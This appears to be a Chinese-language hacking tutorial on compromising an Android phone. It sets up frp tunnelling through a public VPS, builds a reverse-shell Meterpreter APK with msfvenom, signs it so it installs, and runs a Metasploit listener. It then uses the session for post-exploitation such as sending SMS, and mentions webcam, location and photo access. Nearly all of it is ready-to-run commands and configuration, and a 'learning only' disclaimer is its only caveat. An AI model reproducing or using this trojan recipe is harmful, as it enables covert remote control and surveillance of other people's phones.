声明，本文实验仅用作学习和测试实验请勿用作他途
我们先用frp工具来实现端口映射，利用处在内网的攻击机kali实现对处在外网的Android机器的入侵。

1、内网穿透

实验环境：

• 目标Android设备
• 公网vps（centos）
• 内网攻击机kali

思路：

• 公网vps运行frp server
• 本地kali运行frp client
• 将kali本地端口映射到公网vps

VPS 服务端：

将vps作为frp服务端，执行 ./frps -c ./frps.ini ，服务端的配置 frps.ini 如下：

客户端：

将内网攻击机kali作为frp客户端，客户端的配置 frps.ini 如下：

[common]
server_addr = 118.24.74.203 # 这里是公网vps的ip
server_port = 7000 # 这里的端口要跟服务端的一样
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 4444 # 将到达frp服务器的数据转发给本地的4444端口
remote_port = 11111 # 服务端的11111端口转发给本地

客户端通过vps的IP和7000监听端口建立连接，把公网的11111端口数据传递给本地的4444端口。配置完，执行 ./frpc -c ./frpc.ini 启动客户端：

2、Metasploit生成木马

用Metasploit生成载有Payload的Android的apk。在Kali Linux里面打开一个新的窗口输入：

msfvenom -p android/meterpreter/reverse_tcp LHOST=39.xxx.xxx.210(vps公网ip)
LPORT=2333(公网) R > shell.apk
msfvenom -p android/meterpreter/reverse_tcp LHOST=118.24.74.203 LPORT=11111 R >
/home/kali/shell.apk

3、为apk应用签名(非必须)

我们已经成功创建了Android格式（APK）文件的有效载荷。但是，现在一般Android的移动设备不允许
安装没有适当签名证书的应用程序。 Android设备只安装带有签署文件的APK。我们可以使用如下工具
进行手动签名：

Keytool
JARsigner
zipalign

这3个软件，Kali中内置了前2个，第3个需要安装（在新版kali中，JARsigner也需要自己安装apt install
openjdk-11-jdk-headless）

1. 使用keytool生成一个key文件。
   会让你输入该key的名称、单位、地址等等信息，最终生成一个key文件

keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg
RSA -keysize 2048 -validity 10000

上面问你的东西随便填就行，但是要注意，最后不要输入yes要输y，不然会一直询问。
如下图，生成一个key文件：

2. 使用该key文件配合JARsigner为APK签名

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-releasekey.Keystore shell.apk alias_name

3. 然后使用JARsigner验证签名

jarsigner -verify -verbose -certs shell.apk

到此为止，就完成了签名过程，此shell.apk就可以在Android中使用了。

4、开启Metasploit进行监听

使用metasploit监听本地接受数据的端口

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
exploit

然后将载有payload的APK发送到手机上安装并启动，此时，msf上面就可以得到手机的一个session
了：

这里，有的手机得到的session一会儿自动断开，不知道为什么，我自己想了个解决办法是：刚一获得
session就马上执行 webcam_stream 开启远程视频，之后断开视频就可以了，session就稳定了，不会
再断开了，不知道为什么！
在我们获取了目标Android手机的Meterpreter权限之后，我们可以执行如下命令进行后渗透攻击

5、后渗透攻击

查看手机是否root过

check_root

控制目标手机发送短信

send_sms -d 某个手机号码 -t "hello"

在我们获取了目标Android手机的Meterpreter权限之后就可以通过各种命令对被控手机进行各种操作，比如开启摄像头、定位、拍照片啦什么的。命令什么都可以搜到在这里我就不过多展示了感兴趣的自己去了解吧，再说一遍本文实验仅仅用于学习！。